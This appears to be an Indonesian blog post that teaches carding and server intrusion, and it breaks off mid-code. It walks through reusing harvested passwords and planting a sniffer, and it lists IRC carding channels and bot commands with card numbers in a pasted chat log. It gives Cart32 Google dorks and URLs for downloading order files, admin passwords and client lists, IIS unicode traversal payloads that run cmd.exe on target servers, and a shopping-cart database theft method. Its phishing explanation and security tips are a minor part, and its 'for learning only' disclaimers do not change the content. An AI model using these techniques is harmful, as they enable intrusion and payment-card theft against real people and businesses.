style="font-size:100%;">Mengendus dengan mencari informasi dan data data yang berhubungan dengan target kita. Kamu harus berpikir dan menggunakan insting pikiran kamu untuk mendapatkan kode pemecahan dari sebuah masalah. Mungkin pembaca bingung dalam mengartikan masalah ini. Tapi dihadapkan dengan realitas keadaan hal ini akan menjadi sebuah kemungkinan.</span><br /><span style="font-size:100%;">Didalam server kita hanya bisa berkata "bagaimana ini bisa terjadi, dan langkah apa yang sebaiknya aku lakukan didalam server ilegal ini?"</span><br /><span style="font-size:100%;">Pertanyaan untuk memulai social engineering. Pertama kita mencoba berselancar didalam server ilegal tentunya. Membaca email dan mencoba mencari history history yang mendukung ke arah social engineering. Contoh ambil mysql history.</span><br /><span style="font-size:100%;">Biasanya kebiasaan buruk dari orang orang barat adalah "password yang sama untuk setiap email dan link server" Kenapa saya bisa menyimpulkan demikian?</span><br /><span style="font-size:100%;">walaupun tidak semua sysadmin bertindak seperti ini, namun hal ini bisa terjadi. Contoh yang terjadi adalah ketika saya membuka dan membaca mysql history semua password sama persis. Kemudian apa yang kita lakukan? OK tidak ada salahnya kita mencoba mem-finger root dan user satu persatu ternyata root pernah login, dan login dengan menggunakan password yang sama dengan mysql history. Satu langkah kita menuju keberhasilan sebuah psikologis hacking.</span><br /><span style="font-size:100%;">Kemudian tidak ada salahnya kita mencoba melihat dari mana dan dimana dia membeli koneksi/hosting? coba melihat di www.domainwhitepages.com, semua terlihat jelas disana, email administration samapi pop3 email terlihat jelas. Kita bisa coba masuk email dengan menggunakan password yang sama dengan mysql history. Duh ternyata kali ini salah. So what? apa yang akan kita lakukan? terus menebak? Yes thats rights. Kita coba berselancar didalam server baru yang menjadi batu loncatan kedua. Kita lihat file dan document didalam server. mulai dari bash_history mysql_history dan semua kita lihat satu persatu. Ingat social engineering adalah sebuah kebetulan dan sebuah magic.</span><br /><span style="font-size:100%;">Butuh waktu bejam jam bahkan berhari hari untuk memecahkan sebuah masalah.</span><br /><span style="font-size:100%;">Kasus ini berhenti didalam kebuntuan. Semua password yang ada tidak ada yang accept untuk login ke sebuah email, coba query ke Dns IP server. OK ketemu dan ternyata menunjukkan link ke sebuah site. Kita mencoba mencoba menelusuri layaknya sebuah detective cyber :)</span><br /><span style="font-size:100%;">Apa yang kita dapatkan disana? Sebuah link baru menuju email sang admin yang berbeda dengan alamat email sebelumnya. Ok sampai saat ini kita kembali menuju teori lama. Last but no last. Kita mencoba login menggunakan password yang ada didalam log log server pertama dan kedua. Lama kita menunggu ternyata apa yang terjadi? Tidak ada kecocokan sama sekali! Jadi apa yang hendak kita lakukan?</span><br /><span style="font-size:100%;">Gunakan insting kamu. Baca semua home page pribadi. Lihat semua informasi yang berkaitan dengan sang admin. Jangan sia siakan kesempatan ketika kamu berada didalam sever, selalu catat dan perhatikan perubahan yang ada.</span><br /><span style="font-size:100%;">Ternyata ada seorang yang sering login kedalam server, tapi tidak mempunyai otoritas sys-admin. Siapa dia? Seorang wanita bernama beth. Siapa beth? ok</span><br /><span style="font-size:100%;">kita telusuri kembali jejak beth menggunakan finger dan lastlog didalam sebuah server (newbies seriss) Lihat aktivitas apa saja yang dia lakukan.</span><br /><span style="font-size:100%;">OK ternyata beth mempunyai kebiasaan untuk lompat lompat (pindah server antar server). Hal ini menguntungkan kita untuk memasang sniffer :)</span><br /><span style="font-size:100%;">Login beth aku dapatkan dari server www.rrrroar.com menuju ke www.tera-byte.com. Misalnya saja Si A mencoba masuk dari server dimana beth pertama kali login. Beth ternyata hanya sebuah user biasa yang tidak punya previllege sebagai root Aktivitas berhenti sampai disini.</span><br /><span style="font-size:100%;">Satu minggu kemudian dia (Si A) mulai bosan dengan angan angan untuk mencoba teori ini. Namun apa yang terjadi? secara kebetulan beth login ke www.tera-byte.com menggunakan akses root, jangan menunggu panjang segera buka log di sniffer yang sudah terpasang. Apa yang akan kita lakukan untuk langkah final?! Jangan tunggu kedatangan seorang dewa penolong! Segera siapkan sniffer anda, pasang dan ingat! jangan pernah merubah file/sebuah proses yang ada didalam box anda.</span><br /><span style="font-size:100%;">Sekian sebuah pengantar psikologis. Mungkin sedikit dongeng diatas bisa anda jadikan sebagai pola pikir praktis didalam langkah menuju social engineering (expert edition). Kalau sudah berhasil, ingat Anda hanya boleh melihat-lihat (DILIHAT BOLEH DIPEGANG JANGAN!) dan jangan sampai tergoda untuk menyalahgunakan, OK? Ini hanyalah latihan untuk menambah ilmu mengenai network security, jadi hanya untuk pembelajaran demi keilmuwan, tidak untuk disalahgunakan!!</span><br /><br /><span style="font-size:100%;">SECURITY TIPS.</span><br /><span style="font-size:100%;">Untuk menghindari tindakan seperti ini, pastikan bahwa yang menelepon Anda saat itu adalah benar-benar dari pihak bank. Biar lebih yakin, hubungilah pihak Call Center dari bank tersebut. Selanjutnya jangan mudah memberikan nomor kartu kredit maupun nomor telepon Anda kepada pihak lain SIAPAPUN yang tidak jelas. Apalagi disertai dengan 3 angka terakhir di belakang kartu.</span><br /><span style="font-size:100%;">Biasanya bank, hanya akan meminta data customer pada saat melakukan verifikasi untuk menyetujui sebuah kartu kredit. Bank juga tidak pernah meminta data customer dikarenakan perubahan sistem. Sistem perbankan jauh lebih modern ketimbang menelepon setiap nasabahnya untuk melakukan perubahan data.</span><br /><span style="font-size:100%;">Jangan percaya kepada pihak lain, selain bank tempat Anda mendaftar kartu kredit. Misalnya dari asuransi, saham dan sebagainya. Walaupun ada dari bank yang sama misalnya dari bank AAA, tapi yang bagian Asuransi Kredit, ketahuilah mereka tidak akan meminta data Anda. Jika mereka melakukannya berhati-hatilah dan patut dicurigai. Bahkan karyawan bank pun bisa jadi tergoda untuk mencoba-coba menipu Anda sekedar untuk mengorek data finansial Anda, jadi jangan pernah mengungkapkan data finansial Anda terutama hanya lewat pembicaraan telepon ataupun email.</span><br /><span style="font-size:100%;">Biasanya bank akan meminta data seperti di atas apabila Anda yang menelepon kepada pihak Bank untuk memastikan bahwa itu benar customer yang asli. Bukannya pihak Bank yang menelepon customer.</span><br /><span style="font-size:100%;">Sebisa mungkin Anda tolak dengan cara halus. Biasanya bank akan memahami jika ada customer yang keberatan untuk menyebutkan nomor kartu kreditnya. Saya juga pernah melihat pesan berikut pada sebuah kartu kredit.</span><br /><span style="font-size:100%;">----------------------------------------------------------------------------------------</span><br /><span style="font-size:100%;">Demi keamanan kartu kredit Anda, jangan pernah menyerahkan kartu kredit Anda kepada pihak yang mengaku MEWAKILI pihak bank atau badan keuangan lain, dengan alasan apapun.</span><br /><span style="font-size:100%;">----------------------------------------------------------------------------------------</span><br /><br /><span style="font-size:100%;">PHISING.</span><br /><br /><span style="font-size:100%;">Saya yakin, Anda membaca dan membuka-buka artikel dalam situs ini karena ingin mendapatkan teknik melakukan carding melalui internet, ya, kan? Ayo ngaku aja, he...he...he...</span><br /><span style="font-size:100%;">Padahal saya menulis artikel ini agar semua orang tahu bagaimana sepak terjang para carder dalam mencari uang melalui jalan haram. Saya ingin semua orang tahu agar mereka semua tidak mudah ditipu oleh orang-orang macam kalian. (Jangan marah ya! Seperti semua ilmu pengetahuan di dunia ini, semuanya kembali kepada orang yang bersangkutan, mau dipakai apa ilmu yang didapatnya apakah untuk kebaikan atau justru akan disalahgunakan untuk kejahatan!).</span><br /><span style="font-size:100%;">Saya memang sengaja mengulur-ulur waktu supaya Anda tambah penasaran.</span><br /><span style="font-size:100%;">Kasus phising yang paling terkenal adalah kasus situs BCA dan update data email Ebay beberapa tahun yang lalu, dimana sang pelaku memanfaatkan kesalahan manusia yang kalau-kalau salah ketik. Misalnya, nama situs asli bank BCA adalah www.klikbca.com , yang kemudian sang korban salah ketik menjadi www.kilkbca.com , atau www.clickbca.com atau juga www.klikbca.co.id dan masih banyak lagi kemungkinan variasi lainnya.</span><br /><span style="font-size:100%;">Salah ketik satu huruf saja akibatnya bisa berabe. Efek dari phising tersebut bukan cuma bisa tahu nomor kartu kredit, malahan lebih dari itu. Sebab banyak yang menyimpan nomor kartu kredit seseorang di dalamnya, jika account user berhasil diambil oleh pelaku phising. Belum lagi kalau dia mentransfer sejumlah uang. Untung BCA sekarang sudah menggunakan Key BCA yang boleh dibilang "lebih aman", jadi orang tidak bisa sembarangan melakukan transaksi. Bank lainnya yang menggunakan key yang saya tahu adalah BNI. Dalam hal ini kita ngomongin yang ada di Indonesia saja.</span><br /><span style="font-size:100%;">Dari tadi kita sudah berpanjang lebar cerita kasus phising, tapi saya lupa ngasih tahu artinya. Phising adalah singkatan dari Password Harvesting Fishing. Artinya tindakan penipuan dengan menggunakan email palsu atau situs palsu yang bertujuan untuk mengelabui user sehingga pelaku bisa mendapatkan data user tersebut.</span><br /><span style="font-size:100%;">Tindakan penipuan berupa sebuah email yang seolah-olah berasal dari sebuah perusahaan resmi. Misalnya sebuah bank fiktif untuk mendapatkan data-data pribadi seseorang, baik berupa PIN, nomor rekening, nomor kartu kredit dan sebagainya. Yang paling sering adalah para penjahat yang berpura-pura mengaku-ngaku sebagai karyawan Customer Service dari CitiBank. Dapat diduga para pelakunya adalah orang-orang Amerika, Jerman, Eropa Timur ataupun Afrika, karena email tersebut biasanya berbahasa Inggris.</span><br /><span style="font-size:100%;">Pelaku Phising ini dikenal dengan sebutan Phiser. Katakanlah seorang phiser mengirimkan email kepada 1000 orang korban dengan dalih update informasi data konsumen. Dan jika hanya 5% saja yang merespon maka phiser telah berhasil mendapatkan data dari 50 orang. Mengapa ini bisa terjadi, karena Phiser juga berdalih, apabila tidak dilakukan perubahan data maka account user akan dihapus sehingga tidak bisa digunakan lagi. Tentunya akan ada user yang merasa takut, lalu mengikuti saran yang disampaikan. Sebab dalam kebanyakan kasus phising teknik yang digunakan adalah perubahan data, termasuk di dalamnya, password, dan nomor kartu kredit. Jadi berhati-hatilah. Boleh dibilang tindakan ini mirip dengan social engineering.</span><br /><br /><span style="font-size:100%;">SCAM PAGE (HALAMAN SITUS PALSU).</span><br /><br /><span style="font-size:100%;">Berhubung saya membahas mengenai Phising, sekalian saja saya tambahkan secuil informasi yang hampir mirip dengan kasus phising. Teknik ini adalah cara yang dilakukan carder untuk mendapatkan informasi kartu kredit dengan cara membuat sebuah halaman situs konfirmasi palsu yang lebih dikenal dengan julukan SCAM PAGE.</span><br /><span style="font-size:100%;">Contohnya adalah Yahoo Wallet yang diberikan oleh Yahoo untuk pengadaan kartu kredit. Jadi apabila user berbelanja dengan situs Yahoo maka proses verifikasinya hanya sedikit saja, misalnya cukup dengan memasukkan CVV kartu kredit yang dimiliki user.</span><br /><span style="font-size:100%;">Biasanya carder akan bertindak seolah-olah administrator Yahoo, lalu menyampaikan pesan kepada user dengan alasan perubahan data. Untuk melakukannya, klik pada link yang sudah disediakan. Apabila seseorang mengklik link yang dimaksud, user bukannya dibawa menuju ke situs resmi Yahoo, melainkan ke sebuah area registrasi yang mirip dengan kepunyaan Yahoo.</span><br /><span style="font-size:100%;">Apabila user yang telah tertipu tersebut memasukkan data, dan mengklik submit, maka data tersebut akan dikirimkan kepada email carder, bukannya masuk ke dalam database Yahoo.</span><br /><span style="font-size:100%;">Berikut ini adalah contoh sebuah halaman scam page www.aol-customerservice.com yang dulu pernah ada.</span><br /><span style="font-size:100%;">Jika dilihat teknik seperti ini cukup rumit, sehingga carder yang memahami pemrograman web yang bisa membuat halaman palsu registry seperti itu. Walau demikian, scam page sangat berbahaya hasilnya karena bisa dibuat untuk memperoleh semua informasi detail dari user. Dan bisa juga diterapkan untuk banyak hal "perampokan" data lainnya.</span><br /><br /><span style="font-size:100%;">SECURITY TIPS</span><br /><br /><span style="font-size:100%;">Hal yang paling sederhana dan perlu Anda lakukan adalah mengecek dengan benar nama situs yang Anda buka. Jika Anda menerima email dari bank, sebaiknya Anda memeriksa keabsahan email tersebut apakah benar dari bank atau bukan. Sebisa mungkin segera hubungi bank tersebut, apakah email yang dimaksud benar atau tidak.</span><br /><span style="font-size:100%;">Sepengetahuan saya, bank tidak pernah meminta nasabahnya untuk melakukan update data apalagi melalui email. Kalau toh memang ada, biasanya Anda diminta menghubungi pihak bank dengan nomor yang jelas. Jadi, Anda jangan sampai memberikan data-data pribadi apalagi data-data keuangan seperti nomor kartu kredit secara sembarangan. Hal ini telah disampaikan secara resmi oleh Visa pada http://corporate.visa.com/ut/fraud.jsp</span><br /><br /><span style="font-size:100%;">"Visa will never send you an email asking for confidential information such as account numbers, passwords, PIN numbers, credit card numbers or social security numbers."</span><br /><br /><span style="font-size:100%;">Jangan lupa untuk memeriksa kegiatan transaksi perbankan Anda. Supaya tindakan pencegahan dan pengobatan bisa segera ditangani. Berhubung, kebanyakan email yang digunakan adalah spam maka Anda wajib memfilter email yang masuk.</span><br /><span style="font-size:100%;">Jika bisa, Anda dapat memeriksa sertifikat digital situs tersebut. Selain dengan memeriksa sertifikat digital sebuah situs, pada situs resmi, yang memiliki logo VeriSign Secure Site. Pastilah Anda bisa memeriksa keabsahannya, karena memiliki tombol dengan pesan Click to verify.</span><br /><span style="font-size:100%;">Intinya adalah, kita harus selalu berhati-hati. Apalagi saat ini aktivitas phising terus meningkat setiap harinya. Bahkan situs yang ngakunya aman, belum tentu aman 100%.</span><br /><br /><br /><span style="font-size:100%;">CHATTING</span><br /><br /><span style="font-size:100%;">Sebenarnya ini hanyalah sebuah aktivitas chatting biasa saja. Hanya saja di sini ada beberapa channel yang biasanya adalah sebuah komunitas yang membicarakan tema carding. Cara seperti ini pula yang digunakan untuk memperoleh nomor kartu kredit tanpa perlu repot-repot. Cukup dengan masuk ke dalam channel khusus tersebut maka seseorang akan bisa memperoleh nomor kartu kredit dengan mudah. Ada banyak channel, hanya saja disini saya berikan beberapa saja yang pernah saya ketahui:</span><br /><span style="font-size:100%;">#ccposts</span><br /><span style="font-size:100%;">#thecc</span><br /><span style="font-size:100%;">#thacc</span><br /><span style="font-size:100%;">#cvv</span><br /><span style="font-size:100%;">#cc</span><br /><span style="font-size:100%;">#ccs</span><br /><span style="font-size:100%;">#cchome</span><br /><span style="font-size:100%;">#cvv2</span><br /><span style="font-size:100%;">Anda dapat mengunjungi channel-channel tersebut melalui server IRC umum yang banyak digunakan oleh orang, diantaranya DALnet, UnderNet dan Efnet.</span><br /><span style="font-size:100%;">Data dan nomor mengenai kartu kredit itu bisa diminta (request) dengan gratis pada channel-channel tersebut.</span><br /><span style="font-size:100%;">Dalam channel tersebut bisa juga menggunakan command (perintah) tertentu untuk mendukung aktivitas carding.</span><br /><span style="font-size:100%;">Command: !cc digunakan untuk merequest (meminta) nomor kartu kredit.</span><br /><span style="font-size:100%;">Command: !chk digunakan untuk mengecek valid tidaknya nomor yang diperoleh. Contoh:</span><br /><span style="font-size:100%;">!chk1111222233335555</span><br /><span style="font-size:100%;">Command !cvv2 digunakan untuk mendapatkan CVV dari nomor kartu kredit yang dimiliki.</span><br /><span style="font-size:100%;">Command !order.log digunakan untuk data dari nomor kartu kredit. Seperti, nama alamat dan sebagainya.</span><br /><span style="font-size:100%;">Command !proxy digunakan untuk mengetahui nomor port dan proxy yang bisa digunakan untuk menyembunyikan diri.</span><br /><br /><span style="font-size:100%;">Di samping itu pula, untuk mendapatkan nomor kartu kredit bisa dilakukan dengan cara trade atau orang umumnya menyebutnya "barter". Penukaran tersebut bisa berupa apa saja, baik sesama nomor kartu kredit. Bisa pula objek-objek lainnya, misalnya adalah shell account, root, bnc, psybnc, domain, password, dan proxy.</span><br /><span style="font-size:100%;">Sebenarnya, saya tidak begitu tertarik dengan pembahasan chatting ini, sebab saya sendiri jarang sekali melakukan aktivitas chatting ini. Jadi saya beri sedikit cuplikan saja.</span><br /><br /><span style="font-size:100%;">#ccposts</span><br /><br /><span style="font-size:100%;">**Now talking in #ccposts</span><br /><br /><span style="font-size:100%;">** Topic is '..:: Welcome To #CCPOSTS | !Chk [OFF] !Commands [ON] !Cvv2 [ON] Also Idle In</span><br /><span style="font-size:100%;">#Dont.whois.me.b***h and get Aop | 0/ v Verify First| /server xdirc.d2g.com -> Free BNC:/server portatech.net 21500 xdirc'</span><br /><br /><span style="font-size:100%;">** Set by ^XDIrc^ on Thu May 09 02:04:28</span><br /><span style="font-size:100%;">-CCard-Chk-Bot- Tired Of Using Dalnet For Checking CC'S? Try X-Niates 5.01 --</span><br /><span style="font-size:100%;">http://mi5.ausgamers.com/xns501.exe (win ME untested & 24 Valid CC's Included) !cvv2</span><br /><span style="font-size:100%;">5437000105070603 !commands</span><br /><br /><span style="font-size:100%;">** Quits: MIHUTESCU (~mihut@80.97.26.67)</span><br /><br /><span style="font-size:100%;">(Client closed connection) Er0sake',<> is Master > cvv2 : -> 074 <-, by: SL[at]TkiS, #DaCc -listen2rap- SL[a]TkiS's command list is as following: !country Country-Name, !state State-Name, !bank cc-Number, !bnc, !order.log, !cardable, !proxy, !unicode, !cvv2ccNumber _ _=. SL[a]TkiS addon version 4.0, get it at www.sthost4u.net/Programs/slatkis_addon_4.0.zip, #DaCc =_ <@^Enhance^> << <> >> ? <>><></span><br /><br /><span style="font-size:100%;">* I have cc number and I need cc msg me for trade !chk 3732 1694 2923 0058</span><br /><br /><br /><span style="font-size:100%;">CART 32</span><br /><br /><span style="font-size:100%;">Kali ini saya akan mengulas teknik carding pada salah satu aplikasi belanja yang sering digunakan internet yaitu cart32. Ini sebenarnya adalah teknik carding yang sudah umum.</span><br /><span style="font-size:100%;">Ada beberapa syntax yang boleh Anda coba sendiri yang mungkin Anda sukai. Ingat langkah-langkah seperti ini memerlukan bantuan Google Hacking. Caranya masuk saja ke www.google.com , kemudian pada kolom search ketiklah syntax berikut:</span><br /><br /><span style="font-size:100%;">allinurl: cgi-bin/cart32.exe</span><br /><br /><span style="font-size:100%;">atau</span><br /><br /><span style="font-size:100%;">cgis/cart32.exe</span><br /><span style="font-size:100%;">allinurl:/cart32.exe/</span><br /><br /><span style="font-size:100%;">Secara pribadi saya lebih menyukai syntax yang terakhir yaitu: allinurl:/cart32.exe/</span><br /><span style="font-size:100%;">Harap diperhatikan sewaktu Anda melakukan searching di google.com sebab bisa saja model yang Anda peroleh berbeda teksnya. Atau malah versi cart yang berbeda seperti Cart32v3.2 atau yang lainnya.</span><br /><span style="font-size:100%;">Potonglah website tersebut menjadi seperti contoh berikut atau berakhiran dengan kata-kata cart32.exe.</span><br /><span style="font-size:100%;">http://www.situs-target.com/partybows/cgi-bin/cart32.exe/</span><br /><span style="font-size:100%;">Tambahkan kata error pada akhirnya. Jadi, secara lengkap dapat ditulis menjadi:</span><br /><span style="font-size:100%;">http://www.situs-target.com/partybows/cgi-bin/cart32.exe/error</span><br /><span style="font-size:100%;">Kode lain yang bisa Anda gunakan adalah expdate.</span><br /><span style="font-size:100%;">Copy link yang telah Anda modifikasi tersebut pada URL browser Anda, dan jalankan.</span><br /><span style="font-size:100%;">Apabila yang muncul adalah halaman error maka beruntunglah Anda. Karena tujuan kita memang untuk melihat yang error-error. Hanya saja, di sini ada dua jenis error, ada error yang berguna dan ada juga yang tidak berguna. Berikut adalah halaman error yang tidak berguna. Jadi Anda cari website lainnya saja, biar gampang.</span><br /><span style="font-size:100%;">Sedangkan halaman error yang kita cari adalah yang memberikan informasi lebih lengkap. Contohnya adalah yang berisikan informasi CGI.</span><br /><span style="font-size:100%;">Dari informasi tersebut, carilah bagian Page Setup and Directory, pada beberapa kasus namanya adalah Cart32 Setup Info and Directory. Pada bagian tersebut, carilah file yang memiliki ekstensi *.32.</span><br /><span style="font-size:100%;">Misalnya, di sini saya menemukan beberapa diantaranya adalah:</span><br /><span style="font-size:100%;">CABLE-010018.c32</span><br /><span style="font-size:100%;">CABLE-010019.c32</span><br /><span style="font-size:100%;">CABLE-010020.c32</span><br /><span style="font-size:100%;">CABLE-010021.c32</span><br /><span style="font-size:100%;">CABLE-010022.c32</span><br /><span style="font-size:100%;">CABLE-010023.c32</span><br /><span style="font-size:100%;">CABLE-010024.c32</span><br /><span style="font-size:100%;">CABLE-010025.c32</span><br /><span style="font-size:100%;">CABLE-010026.c32</span><br /><span style="font-size:100%;">CABLE-010027.c32</span><br /><span style="font-size:100%;">CABLE-010028.c32</span><br /><br /><span style="font-size:100%;">Aksi berikutnya adalah merubah bentuk URL.</span><br /><span style="font-size:100%;">http://www.situs-target.com/partybows/cgi-bin/cart32.exe/error</span><br /><br /><span style="font-size:100%;">Dengan menghapus error dan juga .exe, maka URLnya menjadi:</span><br /><span style="font-size:100%;">http://www.situs-target.com/partybows/cgi-bin/cart32</span><br /><br /><span style="font-size:100%;">Masukkanlah nama file *.32 yang Anda temukan pada akhir URL menjadi:</span><br /><span style="font-size:100%;">http://www.situs-target.com/partybows/cgi-bin/cart32/nama-file.32</span><br /><br /><span style="font-size:100%;">Contohnya:</span><br /><span style="font-size:100%;">http://www.situs-target.com/partybows/cgi-bin/cart32/CABLE-010018.c32</span><br /><br /><span style="font-size:100%;">Berikut ini adalah petunjuk lainnya dengan model yang berbeda. Caranya hampir sama dengan yang sebelumnya.</span><br /><span style="font-size:100%;">http://www.situs-target.com/scr i pts/cart32.exe/folder-lainnya</span><br /><br /><span style="font-size:100%;">Ubah URL tersebut menjadi:</span><br /><span style="font-size:100%;">http://www.situs-target.com/scr i pts/</span><br /><br /><span style="font-size:100%;">Di belakang scr i pt akan kita beri beberapa unicode. Maka bentuknya menjadi:</span><br /><span style="font-size:100%;">http://www.situs-target.com/scr i pts/</span><br /><br /><span style="font-size:100%;">Berikut daftar unicode yang bisa Anda selipkan untuk dijajal.</span><br /><span style="font-size:100%;">Untuk URL dengan yang terdapat path/scr i pts/ :</span><br /><br /><span style="font-size:100%;">/scr i pts/%c1%9c/winnt/system32/cmd.exe?/c dir c:\</span><br /><br /><span style="font-size:100%;">/scr i pts/..%c0%af../winnt/system32/cmd.exe?/c dir c:\</span><br /><br /><span style="font-size:100%;">/scr i pts/..%255c..%255cwinnt/system32/cmd.exe?/c dir c:\</span><br /><br /><span style="font-size:100%;">/scr i pts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c dir c:\</span><br /><br /><span style="font-size:100%;">/scr i pts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c dir c:\</span><br /><br /><span style="font-size:100%;">/scr i pts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c dir c:\</span><br /><br /><span style="font-size:100%;">/scr i pts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c dir c:\</span><br /><br /><span style="font-size:100%;">Sedangkan untuk URL yang terdapat path/cgi-bin/unicode yang digunakan adalah:</span><br /><span style="font-size:100%;">/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c dir c:\</span><br /><br /><span style="font-size:100%;">/cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c dir c:\</span><br /><br /><span style="font-size:100%;">/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c dir c:\</span><br /><br /><span style="font-size:100%;">Sebagai contoh, untuk path /scr i pts/ gantilah menjadi:</span><br /><span style="font-size:100%;">http://www.situs-target.com/scr i pts/%c1%9c/winnt/system32/cmd.exe?/c dir c:\</span><br /><br /><span style="font-size:100%;">String dir c:\ tujuannya adalah untuk me-list direktori c server situs-target.</span><br /><span style="font-size:100%;">Sekarang untuk menuju direktori cc ganti unicodenya menjadi:</span><br /><br /><span style="font-size:100%;">http://www.situs-target.com/scr i pts/%c1%9c/winnt/system32/cmd.exe?/c dir c:\progra~1\mwainc\cart32\</span><br /><br /><span style="font-size:100%;">Sekarang output list dari file .32, misalnya saja namanya adalah WRBURNS-001065.c32</span><br /><br /><span style="font-size:100%;">http://www.situs-target.com/scr i pts/%c1%9c/winnt/system32/cmd.exe?/c dir c:\progra~1\mwainc\cart32\WRBURNS-001065.c32</span><br /><br /><span style="font-size:100%;">Berhubung semua ini memerlukan kesabaran. Seandainya tidak berhasil, mau tidak mau Anda harus mencoba menggunakan unicode lainnya.</span><br /><span style="font-size:100%;">Sekarang, kita akan melakukan sebuah manuver lain dalam memanipulasi Cart32. Cari di google situs target yang memiliki atau menggunakan Cart32.exe. Misalkan, di sini saya memperoleh target dengan nama http://www.situs-target.com</span><br /><span style="font-size:100%;">Pura-puralah Anda berbelanja dengan membeli satu item. Setelah berbelanja, secara otomatis nama website tersebut akan berubah menjadi:</span><br /><br /><span style="font-size:100%;">https://www.cart32hosting.com/situs-target/cgi-bin/cart32.exe/DONS-AddItem</span><br /><br /><span style="font-size:100%;">Perlu saya tambahkan bahwa mungkin saja situs cart32hosting.com akan berbeda namanya pada situs target lainnya. Begitu juga pada akhir link. Gantilah akhiran pada URL dengan kata error jadinya adalah:</span><br /><br /><span style="font-size:100%;">https://www.cart32hosting.com/situs-target/cgi-bin/cart32.exe/error</span><br /><br /><span style="font-size:100%;">Pesan kesalahan akan muncul, bentuk dan modelnya, kemungkinan juga berbeda.</span><br /><br /><span style="font-size:100%;">Pada kesempatan ini, saya akan mengajarkan cara menculik password adminnya. Caranya hanya dengan mengubah cart32.exe menjadi cart32.ini.</span><br /><span style="font-size:100%;">https://www.cart32hosting.com/bugsandbuggies/cgi-bin/cart32.ini</span><br /><br /><span style="font-size:100%;">Sekarang Anda tinggal mendownload file ini.</span><br /><br /><span style="font-size:100%;">Password dalam file tersebut masih dalam keadaan terenkripsi. Untuk mengenkripsinya, Anda dapat menggunakan Cart32decoder. Sorry banget, saya tidak akan membahas caranya.</span><br /><br /><span style="font-size:100%;">Sebagai bahan percobaan untuk Anda, berikut adalah beberapa direktori yang memiliki vulnerability tepatnya Exploitable Directories.</span><br /><span style="font-size:100%;">/scr i pts/cart32.ini</span><br /><span style="font-size:100%;">/scr i pts/cart32.exe</span><br /><span style="font-size:100%;">/scr i pts/cart32.exe/cart32clientlist</span><br /><span style="font-size:100%;">/scr i pts/c32web.exe/ChangeAdminPassword</span><br /><span style="font-size:100%;">/scr i pts/c32web.exe</span><br /><span style="font-size:100%;">cgi-shl/c32web.exe/</span><br /><br /><span style="font-size:100%;">Berikut saya akan menjelaskan beberapa eksploit yang menarik dan layak untuk Anda coba. Misalnya dengan menggunakan syntax:</span><br /><span style="font-size:100%;">cart32.exe v3</span><br /><br /><span style="font-size:100%;">Setelah Anda menemukan target, sebagai bekal bagi Anda, berikut ini adalah beberapa versi Cart32.exe yang perlu Anda perhatikan, apakah memiliki vulnerability atau tidak.</span><br /><span style="font-size:100%;">v2.5 Sangat bisa</span><br /><span style="font-size:100%;">v3.0 Ya, Lumayan</span><br /><span style="font-size:100%;">v3.5a Ya, Lumayan bisa</span><br /><span style="font-size:100%;">v4.0 Sayang sekali tidak bisa</span><br /><br /><span style="font-size:100%;">Sebenarnya, Anda juga bisa menemukan link:</span><br /><span style="font-size:100%;">http://www.situs-target.com/cgi-bin/cart32.exe/terserah-ada-apa-saja-????</span><br /><br /><span style="font-size:100%;">Biar cepat, langsung saja saya tampilkan teknik eksploitnya:</span><br /><span style="font-size:100%;">Untuk mendapatkan nomor kartu kredit:</span><br /><span style="font-size:100%;">http://www.situs-target.com/cgi-bin/cart32/apa-saja-ORDERS.txt</span><br /><span style="font-size:100%;">atau</span><br /><span style="font-size:100%;">http://www.whatever.com/cgi-bin/cart32/apa-saja-OUTPUT.txt</span><br /><br /><span style="font-size:100%;">Untuk mendapatkan Password Admin.</span><br /><span style="font-size:100%;">http://www.situs-target.com/cgi-bin/cart32.ini</span><br /><br /><span style="font-size:100%;">Untuk mendapatkan Password Klien.</span><br /><span style="font-size:100%;">http://www.situs-target.com/cgi-bin/cart32.exe/cart32clientlist</span><br /><br /><span style="font-size:100%;">Untuk menampilkan Direktori Komputer</span><br /><span style="font-size:100%;">http://www.situs-target.com/cgi-bin/cart32.exe/error</span><br /><br /><span style="font-size:100%;">Setelah berhasil mendapatkan nomor kartu kredit, biasanya carder akan kembali lagi minggu depan atau bulan depannya untuk mendapatkan lagi file orders.txt dengan data terbaru. Begitulah caranya.</span><br /><br /><span style="font-size:100%;">CARDING IN DATABASE</span><br /><br /><span style="font-size:100%;">Carding-in database memiliki dua makna.</span><br /><span style="font-size:100%;">Yang pertama adalah "Cardingin Database".</span><br /><span style="font-size:100%;">Sedangkan yang kedua bisa berarti "Carding in (dalam) database".</span><br /><br /><span style="font-size:100%;">Mulai saat ini dan seterusnya, Anda akan menemukan teknik carding yang ternyata bisa dilakukan dengan begitu sederhana. Anda tidak perlu mengerti proses enkripsi mencuri password terlebih dahulu untuk bisa masuk ke sebuah situs. Dalam bab ini Anda akan mempelajari beberapa teknik yang langsung mengakses database.</span><br /><br /><span style="font-size:100%;">Berikut ini saya berikan sebuah teknik yang bisa digunakan untuk proses carding. Anda tidak memerlukan tools, untuk melakukan hal ini. Hanya bermodalkan sebuah browser, dan membuka situs Google.</span><br /><br /><span style="font-size:100%;">Vsproducts.mdb</span><br /><span style="font-size:100%;">Sebenarnya kalau boleh dibilang teknik ini sudah lama dan kuno. Tapi, sampai saat ini masih banyak yang bisa dicardingin. Semua itu tergantung dari kreativitas Anda.</span><br /><span style="font-size:100%;">File database yang akan dicolong adalah vsproducts.md. File ini merupakan bawaan template shopping cart ASP yang diterapkan pada sistem Microsoft Frontpage. Bagi Anda yang beruntung juga bisa menemukan nomor kartu kredit yang tidak dienkripsi. Sebab enkripsi itu sendiri bersifat optional, jadi tidak bawaan langsung, sehingga bisa langsung tampil.</span><br /><br /><span style="font-size:100%;">Kode untuk menghubungkan database dengan file database yang digunakan adalah sebagai berikut:</span><br /><br /><br /><br /><span style="font-size:100%;">sDSN="Provider=Microsoft.Jet.OLEDB.4.0;Data</span><br /><span 